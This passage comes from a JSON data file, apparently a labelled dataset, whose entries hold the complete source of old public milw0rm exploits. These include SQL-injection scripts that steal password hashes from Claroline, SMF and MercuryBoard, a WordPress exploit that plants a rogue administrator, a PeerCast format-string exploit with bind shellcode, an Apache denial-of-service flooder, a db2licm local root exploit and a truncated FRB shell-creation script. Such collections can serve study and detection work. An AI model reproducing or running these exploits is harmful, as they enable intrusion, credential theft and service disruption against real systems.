.= \"Host: $url\\r\\n\";\n\n   $mh .= \"Connection: Close\\r\\n\\r\\n\";\n\n\n\n  fwrite($fc, $mh);\n\n  while (!feof($fc)) {\n\n  echo fgets($fc, 1024);\n\n  }\n\n   fclose($fc);\n\n}\n\n}\n\n?>\n\n\n\n// milw0rm.com [2005-06-17]",
295        "vulnerable": true
296    },
297    {
298        "exploit_id": 1053,
299        "content": "#!/usr/bin/perl\n\n# Claroline E-Learning Application Remote SQL Exploit\n\n# [K-C0d3r]\n\n# This tools and to consider only himself to educational purpose\n\n# Bug discovered by\n\n# Greetz to mZ, 2b TUBE, off, rikky, str0ke, x0n3-h4ck, MWC\n\n# [K-C0d3r]\n\n\n\nuse IO::Socket;\n\n\n\nsub Usage {\n\nprint STDERR \"Usage: KCcol-xpl.pl <www.victim.com> <path/dir> <target_num>\\n\";\n\nprint STDERR \"Targets:\\n1 - userInfo.php\\n\";\n\nprint STDERR \"2 - exercises_details.php\\n\";\n\nexit;\n\n}\n\n\n\nif (@ARGV < 3)\n\n{\n\n Usage();\n\n}\n\n\n\nif (@ARGV > 3)\n\n{\n\n Usage();\n\n}\n\n\n\nif (@ARGV == 3)\n\n{\n\n$host = @ARGV[0];\n\n$path = @ARGV[1];\n\n$target = @ARGV[2];\n\n\n\nprint \"[K-C0d3r]  Claroline E-Learning Application Remote SQL Exploit [K-C0d3r]\\n\";\n\nprint \"[+] Connecting to $host\\n\";\n\n\n\n$sqli = \"%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null\";\n\n$sqli .= \"%20FROM%20pn_users%20WHERE%20pn_uid=2/*\";\n\n\n\n$socket = new IO::Socket::INET (PeerAddr => \"$host\",\n\n                                PeerPort => 80,\n\n                                Proto => 'tcp');\n\n                                die unless $socket;\n\n\n\nprint \"[+] Injecting command ...\\n\";\n\n\n\nif ($target == 1)\n\n{\n\nprint $socket \"GET http://$host/$path/userInfo.php?uInfo=-1$sqli HTTP/1.1\\nHost: $host\\n\\n Connection: Close\\r\\n\\r\\n\";\n\nwhile (<$socket>)\n\n{\n\n print $_;\n\n exit;\n\n}\n\n}\n\nif ($target == 2)\n\n{\n\nprint $socket \"GET http://$host/$path/exercises_details.php?uInfo=-1$sqli HTTP/1.1\\nHost: $host\\n\\n Connection: Close\\r\\n\\r\\n\";\n\nwhile (<$socket>)\n\n{\n\n print $_;\n\n exit;\n\n}\n\n}\n\n}\n\n\n\n# milw0rm.com [2005-06-19]",
300        "vulnerable": true
301    },
302    {
303        "exploit_id": 1055,
304        "content": "/*\n\n\\\t\tPeerCast <= 0.1211 remote format string exploit \n\n/\t\t\t     [<< Public Release >>]\n\n\\\n\n/ by Darkeagle [ darkeagle [at] linkin-park [dot] cc ]  \n\n\\\t\t\t\t\t\t\t\t\n\n/\tuKt researcherz [ http://unl0ck.org ]\n\n\\\n\n/ greetz goes to: uKt researcherz.\n\n\\\n\n/\n\n\\ - smallest code - better code!!!\n\n/\n\n*/\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <stdarg.h>\n\n#include <string.h>\n\n#include <sys/types.h>\n\n#include <sys/socket.h>\n\n#include <netinet/in.h>\n\n#include <arpa/inet.h>\n\n#include <unistd.h>\n\n#include <netdb.h>\n\n\n\n\n\n//*******************************************\n\n#define doit( b0, b1, b2, b3, addr )  { \\\n\n             b0 = (addr >> 24) & 0xff;  \\\n\n             b1 = (addr >> 16) & 0xff;  \\\n\n             b2 = (addr >>  8) & 0xff;  \\\n\n             b3 = (addr      ) & 0xff;  \\\n\n}\n\n//*******************************************\n\n\n\n\n\n\n\n//****************************************************************\n\nchar shellcode[] = // binds 4444 port\n\n\"\\x31\\xc9\\x83\\xe9\\xeb\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x85\"\n\n\"\\x4f\\xca\\xdf\\x83\\xeb\\xfc\\xe2\\xf4\\xb4\\x94\\x99\\x9c\\xd6\\x25\\xc8\\xb5\"\n\n\"\\xe3\\x17\\x53\\x56\\x64\\x82\\x4a\\x49\\xc6\\x1d\\xac\\xb7\\x94\\x13\\xac\\x8c\"\n\n\"\\x0c\\xae\\xa0\\xb9\\xdd\\x1f\\x9b\\x89\\x0c\\xae\\x07\\x5f\\x35\\x29\\x1b\\x3c\"\n\n\"\\x48\\xcf\\x98\\x8d\\xd3\\x0c\\x43\\x3e\\x35\\x29\\x07\\x5f\\x16\\x25\\xc8\\x86\"\n\n\"\\x35\\x70\\x07\\x5f\\xcc\\x36\\x33\\x6f\\x8e\\x1d\\xa2\\xf0\\xaa\\x3c\\xa2\\xb7\"\n\n\"\\xaa\\x2d\\xa3\\xb1\\x0c\\xac\\x98\\x8c\\x0c\\xae\\x07\\x5f\";\n\n//****************************************************************\n\n\n\n\n\n//****************************\n\n#define HOST \"127.0.0.1\"\n\n#define PORT 7144\n\n#define GOTADDR 0x0809da9c\n\n#define SHELLADDR 0x49adb23c\n\n//****************************\n\n\n\n\n\n\n\n//****************************************************************************************\n\nchar *\n\nevil_builder( unsigned int retaddr, unsigned int offset, unsigned int base, long figure )\n\n{\n\n  char * buf;\n\n  unsigned char b0, b1, b2, b3;\n\n  int start = 256;\n\n\n\n  doit( b0, b1, b2, b3, retaddr );\n\n  buf = (char *)malloc(999);\n\n  memset( buf, 0, 999 );\n\n\n\n b3 -= figure;\n\n b2 -= figure;\n\n b1 -= figure;\n\n b0 -= figure;\n\n\n\n snprintf( buf, 999,\n\n           \"%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n\",\n\n\t     b3 - 16 + start - base, offset, \n\n             b2 - b3 + start, offset + 1, \n\n             b1 - b2 + start, offset + 2,\n\n             b0 - b1 + start, offset + 3 );\n\n\n\n  return buf;\n\n}\n\n//****************************************************************************************\n\n\n\n\n\n\n\n\n\n//****************************************************************************************\n\nint\n\nmain( int argc, char * argv[] )\n\n{\n\n  struct sockaddr_in addr;\n\n  int sock;\n\n  char * fmt;\n\n  char endian[31337], da_shell[31337];\n\n  unsigned long locaddr, retaddr;\n\n  unsigned int offset, base;\n\n  unsigned char b0, b1, b2, b3;\n\n\n\n  system(\"clear\");\n\n  printf(\"*^*^*^ PeerCast <= 0.1211 remote format string exploit ^*^*^*\\n\");\n\n  printf(\"*^*^*^                    by Darkeagle                 ^*^*^*\\n\");\n\n  printf(\"*^*^*^      uKt researcherz [ http://unl0ck.org ]      ^*^*^*\\n\\n\");   \n\n\n\n  memset( endian, 0x00, 31337 );\n\n  memset( da_shell, 0x00, 31337 );\n\n\n\n  addr.sin_family = AF_INET;\n\n  addr.sin_port = htons(PORT);\n\n  addr.sin_addr.s_addr = inet_addr(HOST);\n\n\n\n  sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);\n\n\n\n  locaddr = GOTADDR;\n\n  retaddr = SHELLADDR;\n\n  offset  = 1265; // GET /html/en/index.htmlAAA%1265$x and you will get AAAA41414141\n\n\n\n  doit( b0, b1, b2, b3, locaddr );\n\n\n\n  base = 4;\n\n  printf(\"[*] Buildin' evil code\\n\");\n\n  strcat(endian, \"GET /html/en/index.html\");\n\n  snprintf( endian+strlen(endian), sizeof(endian),\n\n            \"%c%c%c%c\"\n\n            \"%c%c%c%c\"\n\n            \"%c%c%c%c\"\n\n            \"%c%c%c%c\",\n\n             b3, b2, b1, b0,\n\n             b3 + 1, b2, b1, b0,\n\n             b3 + 2, b2, b1, b0,\n\n             b3 + 3, b2, b1, b0 );\n\n\n\n fmt = evil_builder( retaddr, offset, base, 0x10 );\n\n\n\n memset(fmt+strlen(fmt), 0x55, 32);\n\n strcat(fmt, shellcode);\n\n strcat(endian, fmt);\n\n strcat(endian, \"\\r\\n\\r\\n\\r\\n\");\n\n printf(\"[+] Buildin' complete!\\n\");\n\n sprintf(da_shell, \"telnet %s 4444\", HOST);\n\n\n\n // just go, y0!\n\n printf(\"[*] Connectin'\\n\");\n\n if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) ) { printf(\"[-] Connection failed!\\n\\n\"); exit(0); }\n\n\n\n printf(\"[+] Connected!\\n\");\n\n printf(\"[*] Sleepin'\\n\");\n\n sleep(1);\n\n\n\n printf(\"[*] Sendin'\\n\");\n\n send(sock, endian, strlen(endian), 0);\n\n\n\n printf(\"[*] Sleepin'\\n\");\n\n sleep(1);\n\n \t\n\n printf(\"[*] Connectin' in da shell\\n\\n\");\n\n sleep(1);\n\n system(da_shell);\n\n return 0;\n\n}\n\n//****************************************************************************************\n\n\n\n// milw0rm.com [2005-06-20]",
305        "vulnerable": true
306    },
307    {
308        "exploit_id": 1056,
309        "content": "#/usr/bin/perl -w\n\n\n\nuse IO::Socket::INET;\n\n\n\nusage() unless (@ARGV == 2);\n\nmy $host = shift(@ARGV);\n\nmy $port = shift(@ARGV);\n\n\n\nsub usage\n\n{\n\nprint \"\\n***********************************************\";\n\nprint \"\\n Apache HTTPd Arbitrary Long HTTP Headers DoS \\n\";\n\nprint \" Tested Versions : 2 < 2.0.49 \\n\";\n\nprint \" Adv : http://www.guninski.com/httpd1.html \\n\";\n\nprint \" By  : Qnix ,  Q-nix[at]hotmail[dot]com \\n\";\n\nprint \"***********************************************\\n\\n\";\n\nprint \"Usage: apache_ap_get_dos.pl [Host] [Port]\\n\\n\";\n\nexit(1);\n\n}\n\n\n\nmy $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host,\n\nPeerPort=>$port);\n\n$socket or die \"Cannot connect to the host.\\n\";\n\n\n\nbinmode($sock);\n\n\n\n$hostname=\"Host: $host\";\n\n\n\n$buf2='A'x50;\n\n$buf4='A'x8183;\n\n\n\n$len=length($buf2);\n\n\n\n$buf=\"GET / HTTP/1.1\\r\\n\";\n\n\n\nsend($sock,$buf,0) || die \"send error:$@\\n\";\n\nfor($i= 0; $i < 2000000; $i++)\n\n{\n\n   $buf=\" $buf4\\r\\n\";\n\n   send($sock,$buf,0) || die \"send error:$@, target maybe have been\n\nDoS?\\n\";\n\n}\n\n\n\n$buf=\"$hostname\\r\\n\";\n\n$buf.=\"Content-Length: $len\\r\\n\";\n\n\n\n$buf.=\"\\r\\n\";\n\n$buf.=$buf2.\"\\r\\n\\r\\n\";\n\n\n\nsend($sock,$buf,0) || die \"send error:$@\\n\";\n\nprint \"Ok, the buffer sent to the target \\n\";\n\nclose($sock);\n\n\n\n# milw0rm.com [2005-06-20]",
310        "vulnerable": true
311    },
312    {
313        "exploit_id": 1057,
314        "content": "#!/usr/bin/perl -w\n\n################################################################################\n\n# SMF Modify SQL Injection // All Versions // By James http://www.gulftech.org #\n\n################################################################################\n\n# Simple proof of concept for the modify post SQL Injection issue I discovered #\n\n# in Simple Machine Forums. Supply this script with your username password and #\n\n# the complete url to a post you made, and have permission to edit. 06/19/2005 #\n\n################################################################################\n\n\n\nuse LWP::UserAgent;\n\n\n\nif ( !$ARGV[3] ) \n\n{\n\n\tprint \"Usage: smf.pl user pass target_uid modify_url\\n\";\n\n\texit;\n\n}\n\n\n\nprint \"###################################################\\n\";\n\nprint \"# Simple Machine Forums Modify Post SQL Injection #\\n\";\n\nprint \"###################################################\\n\";\n\n\n\nmy $user = $ARGV[0]; # your username\n\nmy $pass = $ARGV[1]; # your password\n\nmy $grab = $ARGV[2]; # the id of the target account\n\nmy $post = $ARGV[3]; # the entire url to modify a post you made\n\nmy $dump = '%20UNION%20SELECT%20memberName,0,passwd,0,0%20FROM%20smf_members%20WHERE%20ID_MEMBER=' . $grab . '/*';\n\n   $post =~ s/msg=([0-9]{1,10})/msg=$1$dump/;\n\nmy $path = ( $post =~ /^(.*)\\/index\\.php/) ? $1: die(\"[!] The post url you entered seems invalid!\\n\");\n\n\n\nmy $ua = new LWP::UserAgent;\n\n   $ua->agent(\"SMF Hash Grabber v1.0\" . $ua->agent);\n\n\n\n$ua->cookie_jar({});\n\n\n\nprint \"[*] Trying $path ...\\n\";\n\n\n\nmy $req = new HTTP::Request POST => $path . \"/index.php?action=login2\";\n\n   $req->content_type('application/x-www-form-urlencoded');\n\n   $req->content('user=' . $user . '&passwrd=' . $pass . '&cookielength=-1');\n\nmy $res = $ua->request($req); \n\n\n\nprint \"[*] Logging In ...\\n\";\n\n\n\n# When a correct login is made, a redirect is issued, and no \n\n# text/html is sent to the browser really. We put 1024 to be\n\n# safe. This part can be altered in case of modded installs!\n\nif ( length($res->content) < 1024 )\n\n{\n\n\tprint \"[+] Successfully logged in as $user \\n\";\n\n\tmy $sid = $ua->get($path . '/index.php?action=profile;sa=account');\t\n\n\n\n\t# We get our current session id to be used\n\n\tprint \"[*] Trying To Get Valid Sesc ID \\n\";\n\n\tif ( $sid->content =~ /sesc=([a-f0-9]{32})/ )\n\n\t{\n\n\t\t# Replace the old session parameter with the\n\n\t\t# new one so we do not get an access denied!\n\n\t\tmy $sesc = $1;\n\n\t\t   $post =~ s/sesc=([a-f0-9]{32})/sesc=$sesc/;\n\n\n\n\t\tprint \"[+] Valid Sesc Id : $sesc\\n\";\n\n\t\tprint \"[*] Trying to get password hash ...\\n\";\n\n\n\n\t\tmy $pwn = $ua->get($post);\t\n\n\t\tif ( $pwn->content =~ />([a-z0-9]{32})<\\//i )\n\n\t\t{\n\n\t\t\tprint \"[+] Got the password hash!\\n\";\n\n\t\t\tprint \"[+] Password Hash : $1\\n\";\n\n\t\t}\n\n\t\telse\n\n\t\t{\n\n\t\t\tprint \"[!] Exploit Failed! Try manually verifying the vulnerability \\n\";\n\n\t\t}\n\n\t}\n\n\telse\n\n\t{\n\n\t\tprint '[!] Unable to obtain a valid sesc key!!';\n\n\t\texit;\n\n\t}\n\n}\n\nelse\n\n{\n\n\tprint '[!] There seemed to be a problem logging you in!';\n\n\texit;\n\n}\n\n\n\n# milw0rm.com [2005-06-21]",
315        "vulnerable": true
316    },
317    {
318        "exploit_id": 1058,
319        "content": "#!/usr/bin/perl\n\n\n\n### MercuryBoard <=1.1.4, MySQL => 4.1 sql injection exploit by RST/GHC\n\n### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n### * note: you need first register on forum for get id and login\n\n### after what logout from forum and run exploit\n\n### * note2: edit timestamp in sources if exploit not work ;)\n\n### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n### (c)oded by 1dt.w0lf\n\n### RST/GHC - http://rst.void.ru , http://ghc.ru\n\n### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\n\nuse IO::Socket;\n\nuse Getopt::Std;\n\n\n\ngetopts('h:f:b:i:l:p:');\n\n\n\n$server    = $opt_h;\n\n$path      = $opt_f;\n\n$member_id = $opt_b;\n\n$hacker_id = $opt_i;\n\n$hacker_l  = $opt_l;\n\n$prefix    = $opt_p || 'mb_' ;\n\n\n\nif(!$server||!$path||!$member_id||!$hacker_id||!$hacker_l) { &usage; }\n\n\n\n$server =~ s!(http:\\/\\/)!!;\n\n\n\n$request  = 'http://';\n\n$request .= $server;\n\n$request .= $path;\n\n\n\n$s_num = 1;\n\n$|++;\n\n$n = 0;\n\n&head;\n\nprint \"\\r\\n\";\n\nprint \" [~]      SERVER  : $server\\r\\n\";\n\nprint \" [~]  FORUM PATH  : $path\\r\\n\";\n\nprint \" [~] ID FOR BRUTE : $member_id\\r\\n\";\n\nprint \" [~]    HACKER ID : $hacker_id\\r\\n\";\n\nprint \" [~] HACKER LOGIN : $hacker_l\\r\\n\";\n\nprint \" [~] TABLE PREFIX : $prefix\\r\\n\\r\\n\";\n\nprint \" [~] SEARCHING PASSWORD ... [|]\";\n\n\n\nwhile(1)\n\n{\n\nif(&found(47,58)==0) { &found(96,103); } \n\n$char = $i;\n\nif ($char==\"0\") \n\n { \n\n if(length($allchar) > 0){\n\n print qq{\\b\\b DONE ] \n\n \n\n -------------------------------------------------------------------\n\n USER ID : $member_id\n\n    HASH : $allchar\n\n -------------------------------------------------------------------\n\n };\n\n }\n\n else\n\n {\n\n print \"\\b\\b FAILED ]\";\n\n }\n\n exit();  \n\n }\n\nelse \n\n {  \n\n $allchar .= chr($char); \n\n }\n\n$s_num++;\n\n}\n\n\n\nsub found($$)\n\n {\n\n my $fmin = $_[0];\n\n my $fmax = $_[1];\n\n if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }\n\n \n\n $r = int($fmax - ($fmax-$fmin)/2);\n\n $check = \"/**/BETWEEN/**/$r/**/AND/**/$fmax\";\n\n if ( &check($check) ) { &found($r,$fmax); }\n\n else { &found($fmin,$r); }\n\n }\n\n \n\nsub crack($$)\n\n {\n\n my $cmin = $_[0];\n\n my $cmax = $_[1];\n\n $i = $cmin;\n\n while ($i<$cmax)\n\n  {\n\n  $crcheck = \"=$i\";\n\n  if ( &check($crcheck) ) { return $i; }\n\n  $i++;\n\n  }\n\n $i = 0;\n\n return $i;\n\n }\n\n \n\nsub check($)\n\n {\n\n $n++;\n\n status();\n\n $ccheck = $_[0]; \n\n \n\n $user_agent2 = \"666',''),($hacker_id, 'board', 0, (SELECT/**/if((ascii(substring((SELECT/**/user_password/**/FROM/**/${prefix}users/**/WHERE/**/user_id=$member_id),$s_num,1)))$ccheck,1119336207,0)), '666.666.666.666', '666', '666')/*\";\n\n\n\n $sock2 = IO::Socket::INET->new( Proto => \"tcp\", PeerAddr => \"$server\", PeerPort => \"80\");\n\n printf $sock2 (\"GET %s?a=active HTTP/1.0\\nHost: %s\\nUser-Agent: %s\\nAccept: */*\\nConnection: close\\n\\n\",\n\n $request,$server,$user_agent2);\n\n \n\n while(<$sock2>) \n\n  {   \n\n  #print $_;\n\n  if (/w=$hacker_id\"\\>$hacker_l/) { return 1; }\n\n  } \n\n\n\n return 0;\n\n }\n\n \n\nsub status()\n\n{\n\n  $status = $n % 5;\n\n  if($status==0){ print \"\\b\\b/]\";  }\n\n  if($status==1){ print \"\\b\\b-]\";  }\n\n  if($status==2){ print \"\\b\\b\\\\]\"; }\n\n  if($status==3){ print \"\\b\\b|]\";  }\n\n}\n\n\n\nsub usage()\n\n {\n\n &head;\n\n print q(\n\n USAGE\n\n    r57mercury.pl [OPTIONS]\n\n  \n\n OPTIONS\n\n  -h [host]     ~ host where mercury board installed\n\n  -f [/folder/] ~ folder where mercury board installed\n\n  -b [user_id]  ~ user id for bruteforce\n\n  -i [id]       ~ hacker id (hacker must be register on forum)\n\n  -l [login]    ~ hacker login on forum\n\n  -p [prefix]   ~ database tables prefix (optional)\n\n                  default is \"mb\"\n\n E.G.\n\n  r57mercury.pl -h www.blah.com -f /mercuryboard/ -b 2 -i 3 -l lamer\n\n -------------------------------------------------------------------\n\n (c)oded by 1dt.w0lf\n\n RST/GHC , http://rst.void.ru , http://ghc.ru\n\n );\n\n exit();\n\n }\n\nsub head()\n\n {\n\n print q(\n\n -------------------------------------------------------------------\n\n MercuryBoard <=1.1.4, MySQL => 4.1 sql injection exploit by RST/GHC\n\n -------------------------------------------------------------------\n\n );\n\n }\n\n\n\n# milw0rm.com [2005-06-21]",
320        "vulnerable": true
321    },
322    {
323        "exploit_id": 1059,
324        "content": "#!/usr/bin/perl\n\n\n\n## WordPress <= 1.5.1.1 sql injection \"add new admin\" exploit\n\n## by RST/GHC , http://rst.void.ru , http://ghc.ru\n\n## coded by 1dt.w0lf\n\n\n\nuse LWP::UserAgent;\n\nuse Getopt::Std;\n\nuse HTTP::Cookies;\n\nuse Digest::MD5 qw(md5_hex);\n\ngetopts('h:p:');\n\n\n\n$path = $opt_h;\n\n$pref = $opt_p || 'wp_';\n\n\n\nif(!$path) { usage(); }\n\n\n\n$xpl = LWP::UserAgent->new() or die;\n\n&header();\n\nprint \" +---[x] STEP 1 - TRY GET ADMIN INFO\\n\";\n\n$reg  = $path;\n\n$reg .= '?%63%61%74=%36%36%36%20%75%6E%69%6F%6E%20%73%65%6C%65%63%74%20%36%36%36%2C%63%6F%6E'.\n\n        '%63%61%74%28%63%68%61%72%28%35%38%2C%35%38%2C%35%38%29%2C%75%73%65%72%5F%6C%6F%67%69'.\n\n        '%6E%2C%63%68%61%72%28%35%38%2C%35%38%2C%35%38%29%2C%75%73%65%72%5F%70%61%73%73%2C%63'.\n\n        '%68%61%72%28%35%38%2C%35%38%2C%35%38%29%29%2C%6E%75%6C%6C%2C%6E%75%6C%6C%2C%6E%75%6C'.\n\n        '%6C%20%66%72%6F%6D%20'.$pref.'%75%73%65%72%73%20%57%48%45%52%45%20%49%44=1'; ### 1 - admin ID\n\n$res = $xpl->get($reg);\n\ndie \"ERROR : \", $res->status_line unless $res->is_success;\n\nif($res->content =~ m/(?::::)(.*)(?::::)([a-f0-9]{32})(?::::)(<\\/title>)/) \n\n  { \n\n  $login = $1; $hash = $2; \n\n  print \"\\n>> LOGIN : $login\\n>>  HASH : $hash\\n\\n\";\n\n  }\n\nelse { print \"ERROR : Forum not vulnerable or bad prefix.\"; exit(); }\n\n\n\n$cookie_jar = HTTP::Cookies->new();\n\n($cpath = $path) =~ s!/$!!;\n\n$hash  = md5_hex($hash);\n\n($host   = $cpath) =~ s!http://([^/]*).*!$1!;\n\n$cpath = md5_hex($cpath);\n\n\n\n$xpl->cookie_jar( $cookie_jar );\n\n\n\n$cookie_jar->set_cookie( \"0\",\"wordpresspass_$cpath\",\"$hash\",\"/\",$host,,,,,);\n\n$cookie_jar->set_cookie( \"1\",\"wordpressuser_$cpath\",\"$login\",\"/\",$host,,,,,);\n\nprint \" +---[x] STEP 2 - CREATE NEW USER\\n\";\n\n$reg  = $path;\n\n$reg .= 'wp-admin/users.php';\n\n$res = $xpl->post(\"$reg\",\n\n{\n\n \"action\"     => \"adduser\",\n\n \"user_login\" => \"r57\",\n\n \"firstname\"  => \"RST\",\n\n \"lastname\"   => \"GHC\",\n\n \"email\"      => \"billy\\@microsoft.com\",\n\n \"uri\"        => \"http://rst.void.ru\",\n\n \"pass1\"      => \"r57\",\n\n \"pass2\"      => \"r57\",\n\n \"adduser\"    => \"Submit\",\n\n},\n\nReferer => $reg\n\n);\n\nprint \" +---[x] STEP 3 - GET ID OF NEW USER\\n\";\n\n$reg  = $path;\n\n$reg .= 'wp-admin/users.php';\n\n$res = $xpl->get(\"$reg\",Referer => $reg);\n\n@res = split(/\\n/,$res->content);\n\n$id = 0;\n\nfor(@res)\n\n {\n\n  if(/(?:\\<td align=\\'center\\'\\>)([0-9]*)(?:\\<\\/td\\>)/) { $id = $1; }\n\n  if(/\\<td\\>\\<strong\\>r57\\<\\/strong\\>\\<\\/td\\>/) { last; }\n\n }\n\ndie \"ERROR : \", $res->status_line unless $res->is_success;\n\nif($id != 0) { print \"\\n>> ID : $id\\n\\n\"; }\n\nelse { print \"[-] ERROR : CAN'T GET NEW USER ID\\n\"; exit(); }\n\nprint \" +---[x] STEP 4 - LEVEL UP FOR NEW USER\\n\\n\";\n\n$reg  = $path;\n\n$reg .= 'wp-admin/users.php?action=promote&id='.$id.'&prom=up';\n\nfor($i=0;$i<10;$i++)\n\n{\n\nprint \">> LEVEL UP # $i\\n\";\n\n$res = $xpl->get(\"$reg\",Referer => $reg);\n\ndie \"ERROR : \", $res->status_line unless $res->is_success;\n\n}\n\nprint \"\\nTHATS ALL. NOW YOU CAN LOGIN WITH USERNAME 'r57' AND PASSWORD 'r57'\\n\";\n\n\n\nsub usage()\n\n{\n\n &header();\n\n print \"USAGE : r57wp.pl [OPTIONS]\\n\";\n\n print \"\\noptions:\\n\\n\";\n\n print \"-h [path]\\n\";\n\n print \"\tPath to wordpress installed\\n\";\n\n print \"-p [prefix] (optional)\\n\";\n\n print \"\tDatabase tables prefix (default 'wp_')\\n\\n\";\n\n print \"e.g.: r57wp.pl -h http://blah.com/wordpress/\\n\";\n\n print \"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\";\n\n print \"(c)oded by 1dt.w0lf\\n\";\n\n print \"RST/GHC\\n\";\n\n print \"http://ghc.ru\\n\";\n\n print \"http://rst.void.ru\\n\";\n\n exit();\n\n}\n\nsub header()\n\n{\n\n print \"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\";\n\n print \"                 WordPress 1.5.1.1 exploit                 \\n\";\n\n print \"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\";\n\n}\n\n\n\n# milw0rm.com [2005-06-21]",
325        "vulnerable": true
326    },
327    {
328        "exploit_id": 106,
329        "content": "/* \n\n\tLocal Exploit for db2licm \n\n\tIBM db2 v 7.1 Linux/x86 \n\n\n\n\tvulnerability researched by \n\n\tJuan Manuel Pascual Escriba\n\n\tpask at uninet.edu\n\n\n\n\n\n */\n\n\n\n\n\n\n\nchar sc[]=\n\n\"\\x31\\xc0\"      /* begin setuid (0) */\n\n\"\\x31\\xdb\"\n\n\"\\xb0\\x17\"\n\n\"\\xcd\\x80\"\n\n\n\n\"\\xeb\\x1f\"\n\n\"\\x5e\"\n\n\"\\x89\\x76\\x08\"\n\n\"\\x31\\xc0\"\n\n\"\\x88\\x46\\x07\"\n\n\"\\x89\\x46\\x0c\"\n\n\"\\xb0\\x0b\"\n\n\"\\x89\\xf3\"\n\n\"\\x8d\\x4e\\x08\"\n\n\"\\x8d\\x56\\x0c\"\n\n\"\\xcd\\x80\"\n\n\"\\x31\\xdb\"\n\n\"\\x89\\xd8\"\n\n\"\\x40\"\n\n\"\\xcd\\x80\"\n\n\"\\xe8\\xdc\\xff\\xff\\xff\"\n\n\"/bin/sh\";\n\n\n\n\n\n#define STACK_TOP_X86 0xC0000000\n\n#define ALG_MASK 0xfffffff4\n\n#define ADDR 1000\n\n#define DB2LICM \"/home/db2inst1/sqllib/adm/db2licm\"\n\n\n\n#define DFL_ALG 4       \n\n\n\nint main(int arc, char **arv){\n\n        char *argv[3];\n\n        char *envp[2];\n\n        unsigned long sc_address, ba=0;\n\n        unsigned char alg = DFL_ALG;\n\n        unsigned long *p;\n\n        unsigned char *q;\n\n        unsigned int i;\n\n\n\n\n\n\n\n        sc_address = STACK_TOP_X86 - 4 - strlen(DB2LICM) - sizeof(sc) - 1;\n\n        printf(\"shellcode address = 0x%X\\n\",sc_address);\n\n\n\n\n\n        if( (sc_address & ALG_MASK) != sc_address ) {\n\n                ba = sc_address - (sc_address & ALG_MASK);\n\n                printf(\"adding %d trailing bytes to backward align Shellcode to 0x%X\\n\", ba,\n\nsc_address & ALG_MASK);\n\n                sc_address = STACK_TOP_X86 - 4 - strlen(DB2LICM) - sizeof(sc) - ba - 1;\n\n                printf(\"new shellcode address = 0x%X\\n\",sc_address);\n\n        }\n\n\n\n        envp[0] = (char*)malloc(sizeof(sc)+strlen(\"pete=\")+1+ba);\n\n        q = envp[0];\n\n        strcpy(q,\"pete=\");\n\n        q += strlen(\"pete=\");\n\n        memcpy(q,sc,sizeof(sc));\n\n        q += sizeof(sc)-1;\n\n        memset(q,'A',ba);\n\n        q += ba;\n\n        *q = 0;\n\n        envp[1] = 0;\n\n\n\n        /* build overflowing arvg[2] */\n\n\n\n\n\n        printf(\"using alignment = %d in overflow buffer\\n\",alg);\n\n\n\n        argv[0] = DB2LICM;\n\n\targv[1] = \"-a\";\n\n        argv[2] = (char*)malloc(ADDR*sizeof(unsigned long)+alg+1);\n\n        memset(argv[2],'A',alg);\n\n        p=(unsigned long*)(argv[2]+alg);\n\n        for(i=0;i<ADDR;i++) {\n\n                *p = sc_address;\n\n                p++;\n\n        };\n\n        *p = 0;\n\n        argv[3] = 0; \n\n\n\n        printf(\"executing %s ...\\n\\n\",argv[0]);\n\n        execve(argv[0],argv,envp); \n\n\n\n\n\n}\n\n\n\n// milw0rm.com [2003-09-27]",
330        "vulnerable": true
331    },
332    {
333        "exploit_id": 1060,
334        "content": "#!/usr/bin/perl\n\n\n\n# Forum Russian Board 4.2 Full (FRB) (http://www.carline.ru , http://frb.ru)\n\n# command execution exploit by RST/GHC (http://rst.void.ru , http://ghc.ru)\n\n# bugs found by foster & 1dt.w0lf , xpl coded by 1dt.w0lf \n\n# RST/GHC - http://rst.void.ru , http://ghc.ru\n\n\n\nuse IO::Socket;\n\nuse Getopt::Std;\n\n\n\ngetopts(\"h:p:u:i:c:\");\n\n\n\n$host  = $opt_h;\n\n$path  = $opt_p;\n\n$user  = $opt_u;\n\n$id    = $opt_i;\n\n$cmd   = $opt_c || 'create';\n\n\n\n$cmdspl = \"%26%26\"; # ;      - for unix\n\n                    # %26%26 - for windows\n\n\n\nif(!$host || !$path) { usage(); }\n\nif(($cmd eq 'create' || $cmd eq 'delete') && (!$user || !$id)) { usage(); }\n\n\n\n$host =~ s/(http:\\/\\/)//g;\n\n$cook = $user.\"' /*\";\n\n\n\nif($cmd eq 'create' || $cmd eq 'delete'){\n\nhead();\n\nprint \">>> CREATE SHELL\\n\" if ($cmd eq 'create');\n\nprint \">>> DELETE SHELL\\n\" if ($cmd eq 'delete');\n\n$sock = IO::Socket::INET->new( Proto => \"tcp\", PeerAddr => \"$host\", PeerPort => \"80\") || die \"[-] CONNECT FAILED\\n\";\n\nprint $sock \"GET ${path}admin/style_edit.php HTTP/1.1\\n\";\n\nprint $sock \"Host: $host\\n\";\n\nprint $sock \"Accept: */*\\n\";\n\nprint $sock \"Cookie: board_user_cook=$cook;board_user_id=$id\\n\";\n\nprint $sock \"Connection: close\\n\\n\";\n\nprint \"GETTING CURRENT STYLE ... [\";\n\nwhile ($res = <$sock>)\n\n{\n\n if($res =~ 